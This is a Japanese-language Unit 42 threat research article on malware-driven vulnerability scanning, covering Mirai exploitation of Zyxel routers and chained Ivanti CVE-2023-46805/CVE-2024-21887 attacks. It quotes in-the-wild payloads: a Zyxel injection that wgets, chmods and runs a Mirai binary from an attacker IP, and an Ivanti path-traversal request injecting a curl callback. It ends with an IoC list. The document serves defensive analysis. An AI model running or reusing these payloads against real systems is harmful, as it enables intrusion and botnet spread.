[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/malware-initiated-scanning-attacks/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/malware-initiated-scanning-attacks/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# 攻撃者による直接スキャンではないマルウェア駆動型脆弱性スキャン攻撃の増加傾向が明らかに

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 3 分で読めます  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/ja/product-category/advanced-dns-security-ja/ "Advanced DNS Security")[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/ja/product-category/advanced-threat-prevention-ja/ "Advanced Threat Prevention")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cloud-Delivered Security Services icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Cloud-Delivered Security Services](https://unit42.paloaltonetworks.com/ja/product-category/cloud-delivered-security-services-ja/ "Cloud-Delivered Security Services")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/ja/product-category/next-generation-firewall-ja/ "Next-Generation Firewall")[![Prisma Cloud icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/prisma_RGB_logo_Icon_Color.png)Prisma Cloud](https://unit42.paloaltonetworks.com/ja/product-category/prisma-cloud-ja/ "Prisma Cloud")[![Prisma Cloud WAAS icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/prisma_RGB_logo_Icon_Color.png)Prisma Cloud WAAS](https://unit42.paloaltonetworks.com/ja/product-category/prisma-cloud-waas-ja/ "Prisma Cloud WAAS")[![Prisma SASE icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/prisma_RGB_logo_Icon_Color.png)Prisma SASE](https://unit42.paloaltonetworks.com/ja/product-category/prisma-sase-ja/ "Prisma SASE")[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/ja/product-category/unit-42-incident-response-ja/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Beliz Kaleli](https://unit42.paloaltonetworks.com/ja/author/beliz-kaleli/)
  * [Fang Liu](https://unit42.paloaltonetworks.com/ja/author/fang-liu/)
  * [Peng Peng](https://unit42.paloaltonetworks.com/ja/author/peng-peng/)
  * [Alex Starov](https://unit42.paloaltonetworks.com/ja/author/alex-starov/)
  * [Joey Allen](https://unit42.paloaltonetworks.com/ja/author/joey-allen/)
  * [Stefan Springer](https://unit42.paloaltonetworks.com/ja/author/stefan-springer/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2024年4月8日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Ivanti](https://unit42.paloaltonetworks.com/ja/tag/ivanti-ja/)
  * [Mirai](https://unit42.paloaltonetworks.com/ja/tag/mirai-ja/)
  * [Network scanning](https://unit42.paloaltonetworks.com/ja/tag/network-scanning-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/malware-initiated-scanning-attacks/?pdf=download&lg=ja&_wpnonce=46edad538b "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/malware-initiated-scanning-attacks/?pdf=print&lg=ja&_wpnonce=46edad538b "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=攻撃者による直接スキャンではないマルウェア駆動型脆弱性スキャン攻撃の増加傾向が明らかに&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalware-initiated-scanning-attacks%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalware-initiated-scanning-attacks%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalware-initiated-scanning-attacks%2F&title=攻撃者による直接スキャンではないマルウェア駆動型脆弱性スキャン攻撃の増加傾向が明らかに "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalware-initiated-scanning-attacks%2F&text=攻撃者による直接スキャンではないマルウェア駆動型脆弱性スキャン攻撃の増加傾向が明らかに "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalware-initiated-scanning-attacks%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=攻撃者による直接スキャンではないマルウェア駆動型脆弱性スキャン攻撃の増加傾向が明らかに%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalware-initiated-scanning-attacks%2F "Share in Mastodon")

## **概要**

マルウェアから開始される「マルウェア駆動型スキャン攻撃」を行う脅威アクターの数が増加してきていることが、弊社のテレメトリーからわかってきました。本稿は「攻撃者らが直接的なスキャンという従来のアプローチに代えて、どのように感染ホストを使ってマルウェア駆動型のスキャンを実行しているか」を解説します。

脅威アクターらは長年、ネットワークやシステムの脆弱性をピンポイントで特定するのにスキャンという手法を用いてきました。スキャン攻撃のなかには無害なネットワークから発生しているものがありますが、それらは感染マシン上でマルウェアによって実行されている可能性があります。侵害したホストからスキャン攻撃を仕掛けることで、攻撃者は以下を達成できるのです。

* 痕跡を隠す
* ジオフェンシングを回避する
* ボットネットを拡大する
* 侵害デバイスのリソース活用により、自前デバイスのみの場合と比べたスキャン リクエスト数を増やす

私たちは、たとえば「リクエスト数が異常に多い」など、スキャンの動作で顕著に見られる特性を複数特定しました。これらの特性と既知の脅威のシグネチャを使用すれば、既知のスキャン パターンだけでなく、新たに出現してきたスキャン パターンも検出できます。

パロアルトネットワークスのお客さまは、[Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)、[Advanced Threat Prevention](https://docs.paloaltonetworks.com/advanced-threat-prevention)、[Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)、[DNS Security](https://www.paloaltonetworks.jp/network-security/dns-security) などの[クラウド配信型セキュリティサービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)を有効にした[次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)や [Prisma SASE](https://www.paloaltonetworks.jp/sase) を通じて、悪意のあるスキャン アクティビティからの保護を受けています。

[Prisma Cloud WAAS](https://www.paloaltonetworks.jp/prisma/cloud/web-application-API-security) モジュールは、クラウドネイティブ Web アプリケーションと API エンドポイントをスキャン攻撃から保護するのに役立ちます。

侵害の懸念があり弊社にインシデントレスポンスに関するご相談をなさりたい場合は、[こちら](https://start.paloaltonetworks.jp/contact-unit42.html)の問い合わせフォームからご連絡いただくか、infojapan@paloaltonetworks.com まで電子メールにてお問い合わせください (ご相談は弊社製品のお客様には限定されません)。

| **関連する Unit 42 のトピック** | [**Ivanti**](https://unit42.paloaltonetworks.jp/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/), **[Mirai](https://unit42.paloaltonetworks.jp/tag/mirai-ja/)** |
|------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------|

## **スキャン攻撃の概要**

スキャンは、ターゲット ホストに存在しうる脆弱性の悪用を狙い、攻撃者がネットワーク リクエストを開始したさいに発生します。ターゲットにされるホストは通常は無害で、攻撃者がターゲットとする CVE に対して潜在的に脆弱なホストです。

よくあるスキャンの動作とは次のようなものです。

* ポート スキャン
* 脆弱性スキャン
* OS フィンガープリンティング

図 1 は、攻撃者による単純で直接的なスキャン インシデントの攻撃モデルを示したものです。このモデルでは、攻撃者が ([MOVEit に関する脅威概要で私たちが解説したように](https://unit42.paloaltonetworks.jp/threat-brief-moveit-cve-2023-34362/)) HTTP POST リクエストを架空の random-university\[.\]edu に送信し、MOVEit の脆弱性 CVE-2023-34362 をスキャンして悪用しようとしています。仮に random-university\[.\]edu がこの CVE に対して脆弱で、ほかの保護メカニズムが使われていないなら、この攻撃は成功します。
![図 1 は、攻撃者による直接スキャンのしくみを示す図です。攻撃者はターゲット ホストに HTTP POST リクエストを送信しています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/04/word-image-976438-133284-1-1.png) 図 1. 攻撃者による直接スキャン

## **ネットワークをまたぐ監視により浮かび上がった新たなスキャン パターン**

複数のネットワークをまたいでトラフィック ログを追跡してみると、一見無害なパスをもつ、宛先が多数のリクエストを確認できます。たとえば私たちのテレメトリーは、2023 年に、少なくとも 1,406 台のデバイスから、 guestaccess.aspx で終わる URL に対し、7,147 回のリクエストがあったことを示しています。このエンドポイントは、2023 年 6 月 2 日に公開された MOVEit の脆弱性、CVE-2023-34362 に関連するものです。

履歴データを確認してみたところ、実に MOVEit の CVE の公開日以前から、弊社のテレメトリーで、さまざまな宛先 Web サイトをもつこのエンドポイントが観測されていました。複数のネットワークをまたいでテレメトリーを確認した結果、2023 年には、スキャン アクティビティに関連しうるリクエストの検出数が 6,600 万件を超えていました。

## **ペイロード配布または C2 用に新たな URL を使うスキャン攻撃**

私たちが観測した多数のスキャン事例のなかには、攻撃者がエクスプロイト リクエストとともに、それまでに観測されたことのない URL をペイロード配布または C2 用に埋め込んでいる事例が見られました。こうすることで、後続のペイロードや C2 の URL がセキュリティ ベンダーにブロックされる可能性は下がります。これらのペイロード配布用 URL や C2 用 URL はセキュリティ ベンダーにとっては未知のものです。つまり、このあと生じるリクエストをベンダーがブロックする可能性は低いことになります。したがって、初期のスキャン リクエストの段階で検出・ブロックすることが極めて重要になります。

私たちは 2024 年 1 月 12 日 11:23:49 UTC に、ある Mirai 亜種によるスキャンを検出しました。この亜種は、ペイロードに次の悪意のある URL を含んでいました。

* 103\.245.236\[.\]188/skyljne.mips

私たちは 2024 年 1 月 18 日 07:31:07 UTC に [Ivanti の脆弱性](https://unit42.paloaltonetworks.jp/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/)のエクスプロイト試行を検出しました。これは以下の悪意のある URL をペイロードとして含んでいました。

* 45\.130.22\[.\]219/ivanti.js

上記の両例では、スキャン リクエストの発生後かなり経ってから後続の悪性ペイロード配布や C2 用 URL が検出されていたことがわかりました。このことは、スキャン アクティビティをブロックし、悪意のある URL を識別することにより、新興脅威の迅速な特定と対応を行うという、スキャン検出の有効性を物語っています。

## **マルウェアによる感染デバイスの乗っ取りとスキャン攻撃の開始**

自社のテレメトリーを分析した結果、私たちはマルウェア駆動型スキャン攻撃の脅威モデルを発見しました。このモデルでは、攻撃者はデバイスを感染させ、そのリソースを使ってスキャンを実行します。

通常、あるデバイスがマルウェアに感染すると、このマルウェアが攻撃者の制御する C2 ドメインにビーコンを送信して指示を求めます。脅威アクターは、マルウェアにスキャン攻撃の実行を指示できます。次に、侵害デバイス上のマルウェアが、さまざまなターゲット ドメインへのスキャン リクエストを開始します。

たとえば、あるホストが Mirai の亜種 (SHA256: 23190d722ba3fe97d859bd9b086ff33a14ae9aecfc8a2c3427623f93de3d3b14) に感染したとします。次に、この Mirai 亜種は 193.47.61\[.\]75 にある C2 サーバーに接続し、そこでスキャンを開始せよという指示を受けます。

指示を受けた Mirai 亜種は、感染デバイスのリソースを使い、さまざまなターゲットへのスキャン リクエストを開始します。図 2 は、マルウェア駆動型スキャンの単純な脅威モデルを示したものです。攻撃者が欲する結果は脆弱なターゲットを見つけて悪用することです。
![画像 2 はマルウェア駆動型スキャンを示す図です。感染ホストは、ターゲットのホスト 2 台をスキャンして悪用しています。コマンド \& コントロール ドメインと感染ホストとの間ではビーコンが送受信されています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/04/word-image-979173-133284-2-1.png) 図 2. マルウェア駆動型スキャン

脅威アクターのもくろむ攻撃の種類に応じてターゲットは異なります。たとえば、ある攻撃者は政府などの特定組織をターゲットとしている可能性があります。その場合の攻撃者は、その政府の Web サイトにだけ当はまる複数の CVE を使ったエクスプロイトを試行する可能性が高くなります。

またべつの攻撃者は、ボットネット拡大などのさまざまな目的で、できるだけ多くの Web サイトのエクスプロイトを試行します。そうしたケースでは、攻撃者は対象範囲をさまざまなターゲットに広げることになります。

ここでは、先に説明した脅威モデルに適合する分析から得た、この振る舞いのケース スタディを論じます。

## **拡散ツールセットを拡充しつづける Mirai ボットネット**

私たちのテレメトリーには、[ある Mirai 亜種について私たちが 2023 年に報告した](https://unit42.paloaltonetworks.jp/mirai-variant-iz1h9/)、Zyxel におけるリモートコード実行の脆弱性のエクスプロイト試行が反映されています。このエクスプロイトは、特定バージョンの Zyxel ルーターの /bin/zhttpd/ コンポーネントにおける不十分な入力検証の脆弱性をターゲットとして悪意のあるファイルをダウンロードします。その後このファイルは自己複製を開始し、Mirai ボットネットをさらに拡散させます。

2023 年 6 月 19 日に私たちは、スキャンされたユニークな宛先数の異常な急増を確認しました。このなかでは、少なくとも 2,247 台のデバイスが、15,812 件の宛先インターネット サービス プロバイダー (ISP) に対する分散型エクスプロイト試行に関与していました。図 3 は、同脆弱性にからみ、23 日間にわたってスキャンされた、以下の URL パターンをもつ一意なターゲットの数を示したものです。

bin/zhttpd/${ifs}cd${ifs}/tmp;${ifs}rm${ifs}-rf${ifs}\*;${ifs}wget${ifs}hxxp://103.110.33\[.\]164/mips;${ifs}chmod${ifs}777${ifs}mips;${ifs}./mips${ifs}zyxel.selfrep;.

なお上記パターン内の 103.110.33\[.\]164 というのはひとつの例にすぎません。この URL パターンは単一の IP アドレスに限られるものではなく、私たちはほかにも複数のものを下の図 3 に示した結果のなかで発見しています。
![画像 3 は、Zyxel の脆弱性にからんでスキャンされた一意なターゲットの数を示した棒グラフです。このグラフは 2023 年 6 月 9 日に始まり、2023 年 7 月 1 日に終わっています。大多数の日は平均約 1500 件を記録しています。2 つ大きなピークがあり、それらは 2023 年 6 月 19 日と 2023 年 6 月 20 日のものです。これらの日付については、15,812 件、13,409 件をそれぞれ記録しています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/04/word-image-982431-133284-3.png) 図 3. Zyxel の脆弱性にからむスキャンの一意なターゲット数 (日付別)

Mirai ボットネットは進化し続けており、エクスプロイトのために、常に新たな脆弱性をそのレパートリーに組み込み続けています([\[1\]](https://unit42.paloaltonetworks.jp/mirai-variant-v3g4/)[\[2\]](https://unit42.paloaltonetworks.jp/mirai-variant-iz1h9/)[\[3\]](https://unit42.paloaltonetworks.jp/mirai-variant-targets-iot-exploits/))。新たな脆弱性が発表されると、脅威アクターはそれらの脆弱性をエクスプロイトする新たな Mirai 亜種を開発します。

このサイクルに先んじるための最も重要な防御策は、脆弱性を修正し、検出システムを更新して、新しい Mirai の亜種を識別・ブロックできるようにすることです。新たな脆弱性が絶えず発表されていることを考えると、これらの検出・更新を迅速に実行することはとくに困難です。ただし、複数のネットワークにまたがるスキャン アクティビティを監視することで、新たなスキャン パターンをより迅速に検出できる可能性があります。

## **Ivanti の脆弱性スキャンは開示後の 1 週間に急増**

私たちのテレメトリーは[最近公開された以下の Ivanti 製品の脆弱性](https://unit42.paloaltonetworks.jp/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/)を検出しています。

* CVE-2023-46805 (深刻度「高」の認証バイパスの脆弱性)
* CVE-2024-21887 (深刻度「緊急」のコマンド インジェクションの脆弱性)
* CVE-2024-21893 (深刻度「高」のサーバーサイド リクエスト フォージェリーの脆弱性)

これらの脆弱性の詳細は Unit 42 による [Ivanti に関する脅威の概要](https://unit42.paloaltonetworks.jp/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/)をご確認ください。

図 4 は、2024 年 1 月 14 日から観測された、スキャンされた一意なターゲット数の急増を示したものです。このなかで脅威アクターらは、Ivanti 製品の脆弱性のスキャンと悪用にさまざまな URL パスを使っていました。1 月 14 日には、少なくとも 15,645 台の感染ホストによって、25,289 台の一意なホストがスキャンされています。最初の急増からわずか 4 日後の 2024 年 1 月 18 日には、これらの数字が跳ね上がっており、少なくとも 39,658 台の感染ホストによって、84,824 台の一意なホストがスキャンされているようすが確認されています。
![画像 4 は、Ivanti の脆弱性にからんでスキャンされた一意なターゲット数を示した棒グラフです。このグラフは 2024 年 1 月 7 日に始まり、2024 年 1 月 21 日に終わっています。件数は 2024 年 1 月 14 日から増加し、2024 年 1 月 18 日には 84,824 件でピークに達します。その後、件数は 6,633 に急減し、先細りになります。](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/04/word-image-985249-133284-4.png) 図 4. Ivanti の脆弱性をターゲットとしてスキャンされた一意なホスト数 (日付別)

1 月 19 日に、少なくとも 32 台の感染ホストから、37 台の一意な被害ホストに対し、次の URL パスをもつリクエストが観測されました。

* api/v1/totp/license/keys-status/;curl a0f0b2e6\[.\]dnslog\[.\]store

これは脆弱性をつなぎ合わせて使う「チェーン攻撃」で、ここでは脅威アクターが CVE-2023-46805 と CVE-2024-21887 を組み合わせて使っていました。この場合、/license/keys-status のエンドポイントは認証で保護されていましたが、これにはコマンド インジェクションの脆弱性がありました。

認証回避のために、攻撃者はパス トラバーサルを利用し、次の HTTP GET リクエストを送信していました。

* /api/v1/totp/user-backup-code/../../license/keys-status;\<attacker\_cmd\>

/api/v1/totp/user-backup-code のエンドポイントは URL のプレフィックス チェックしか実行しません。このため、この GET リクエストは認証をバイパスしてコマンド インジェクションの脆弱性がある同エンドポイントにアクセスできました。

私たちが観測した例では、脅威アクターはこのチェーン攻撃を実行して a0f0b2e6\[.\]dnslog\[.\]store に接続しようとしていました。攻撃者はこのドメインを使って脆弱なターゲットの IP アドレスを収集し、さらなる攻撃を実行する可能性があります。

## **脆弱性スキャンのカテゴリー**

ルーター、Web アプリケーション開発/テスト フレームワーク、電子メールやカレンダーなどのコラボレーション ツールの脆弱性は、その利用数の多さから攻撃者の人気を集めています。図 5 は、私たちのテレメトリーに基づいて、攻撃者に最も狙われやすい技術スタックを示したものです。
![画像 5 は、最も狙われる技術スタックのカテゴリーを示した円グラフです。コラボレーション、Web 開発フレームワーク、ルーターは、それぞれ 32.1%、31.6%、35.2% とほぼ均等に分かれています。オペレーティング システムは 1% でした。](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/04/word-image-988036-133284-5-1.png) 図 5. 攻撃者に狙われやすい技術スタック

とくにルーターの攻撃は攻撃者らに非常に人気があります。最近のインシデントだと、[ロシアのハッカーが Ubiquiti EdgeRouters の乗っ取りを試みた](https://www.bleepingcomputer.com/news/security/russian-hackers-hijack-ubiquiti-routers-to-launch-stealthy-attacks/)件や、[中国の SOHO ボットネットが Cisco とNetGear のルーターをターゲットにした](https://www.bleepingcomputer.com/news/security/fbi-disrupts-chinese-botnet-by-wiping-malware-from-infected-routers/)件があります。弊社のデータは、脆弱性のスキャンはこれら特定ブランドのルーターに限ったものではないことを示しています。

## **結論**

弊社のテレメトリーは、私たちが 2023 年に検出したスキャン攻撃にマルウェア駆動型スキャンが相当数含まれていたことを示しています。マルウェア駆動型のスキャンは、従来見られた攻撃者によるより直接的なスキャン アプローチと比べるとあまり直接的でないスキャン形式です。

弊社のデータは、2023 年に出現したさまざまな脆弱性関連のスキャンで見られた、これ以外の傾向も明らかにしています。これらの調査結果が指し示すのは「ターゲットにされやすい脆弱性は、広範なターゲットに影響を与える可能性が高い脆弱性」ということです。

このデータはスキャンに対する積極的監視と防御メカニズムの重要性を強調するものとなっています。

パロアルトネットワークスのお客さまは、[Advanced URL (AURL) Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)、[Advanced Threat Prevention](https://docs.paloaltonetworks.com/advanced-threat-prevention)、[Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)、[DNS Security](https://www.paloaltonetworks.jp/network-security/dns-security) などの[クラウド配信型セキュリティサービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)を有効にした[次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)や [Prisma SASE](https://www.paloaltonetworks.jp/sase) を役立てることができます。

とくに [AURL Filtering](https://docs.paloaltonetworks.com/advanced-url-filtering) は進化するスキャン攻撃情勢に対する堅牢な保護を提供します。具体的には、AURL をご利用のお客さまは、Scanning Activity (スキャン アクティビティ) のカテゴリーをブロックするだけで、本稿で解説したスキャンの動作をブロックできます。

また、[Prisma Cloud WAAS](https://www.paloaltonetworks.jp/prisma/cloud/web-application-API-security) モジュールは、クラウドネイティブ Web アプリケーションと API エンドポイントをスキャン攻撃から保護するのに役立ちます。

侵害の懸念があり弊社にインシデントレスポンスに関するご相談をなさりたい場合は、[こちら](https://start.paloaltonetworks.jp/contact-unit42.html)の問い合わせフォームからご連絡いただくか、infojapan@paloaltonetworks.com まで電子メールにてご連絡いただくか、下記の電話番号までお問い合わせください(ご相談は弊社製品のお客様には限定されません)。

* 北米フリーダイヤル: 866.486.4842 (866.4.UNIT42)
* EMEA: +31.20.299.3130
* APAC: +65.6983.8730
* 日本: (+81) 50-1790-0200

パロアルトネットワークスは、これらの調査結果を Cyber Threat Alliance (CTA: サイバー脅威アライアンス) のメンバーと共有しました。CTA のメンバーはこのインテリジェンスを使って、お客様に保護を迅速に提供し、悪意のあるサイバー攻撃者を体系的に阻害できます。詳細は [Cyber Threat Alliance](https://www.cyberthreatalliance.org) にてご確認ください｡

## **IoC (侵害指標)**

**Mirai マルウェアをホストしていた IP アドレス、URL、SHA**

* 45\.66.230\[.\]32
* 85\.208.139\[.\]73
* 87\.120.88\[.\]13
* 95\.214.27\[.\]244
* 103\.110.33\[.\]164
* 103\.95.196\[.\]149
* 103\.131.57\[.\]59/mips
* 103\.212.81\[.\]116
* 103\.228.126\[.\]17
* 145\.40.126\[.\]81/mips
* 146\.19.191\[.\]85
* 146\.19.191\[.\]108
* 176\.97.210\[.\]211/mips
* 185\.112.83\[.\]15
* 193\.31.28\[.\]13
* 193\.47.61\[.\]75
* 217\.114.43\[.\]149
* 23190d722ba3fe97d859bd9b086ff33a14ae9aecfc8a2c3427623f93de3d3b14

**Ivanti の脆弱性スキャンに関連していたドメインと URL**

* dnslog\[.\]store
* hxxp://45.130.22\[.\]219/ivanti.js
* 137\.220.130\[.\]2/doc

## **謝辞**

本稿執筆で支援していただいた Unit 42 チームにお礼申し上げます。また、本稿について貴重な助言をくださった Bradley Duncan、Lysa Myers 各氏にはとくに厚くお礼を申し上げます。
トップに戻る

### タグ

* [Ivanti](https://unit42.paloaltonetworks.com/ja/tag/ivanti-ja/ "Ivanti")
* [Mirai](https://unit42.paloaltonetworks.com/ja/tag/mirai-ja/ "Mirai")
* [Network scanning](https://unit42.paloaltonetworks.com/ja/tag/network-scanning-ja/ "network scanning")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:\[2024-04-12 JST 更新\] 脅威に関する情報: 複数の Linux ディストリビューションに影響を与える XZ Utils データ圧縮ライブラリーの脆弱性 (CVE-2024-3094)](https://unit42.paloaltonetworks.com/ja/threat-brief-xz-utils-cve-2024-3094/ "[2024-04-12 JST 更新] 脅威に関する情報: 複数の Linux ディストリビューションに影響を与える XZ Utils データ圧縮ライブラリーの脆弱性 (CVE-2024-3094)")

### 目次

* 

### 関連記事

* [野放し状態で悪用されているIvanti EPMMの深刻な脆弱性](https://unit42.paloaltonetworks.com/ja/ivanti-cve-2026-1281-cve-2026-1340/ "article - table of contents")
* [\[2024-03-01 JST 更新\] 脅威に関する情報: Ivanti Connect Secure、Ivanti Policy Secure における脆弱性 (CVE-2023-46805、CVE-2024-21887、CVE-2024-21888、CVE-2024-21893、CVE-2024-22024)](https://unit42.paloaltonetworks.com/ja/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/ "article - table of contents")
* [\[2023-08-24 JST 更新\] 脅威に関する情報: Ivanti Endpoint Manager Mobile にゼロデイのリモートの未認証 API アクセスを含む複数の脆弱性 (CVE-2023-35078, CVE-2023-35081, CVE-2023-35082, CVE-2023-32560, CVE-2023-3803)](https://unit42.paloaltonetworks.com/ja/threat-brief-cve-2023-35078/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
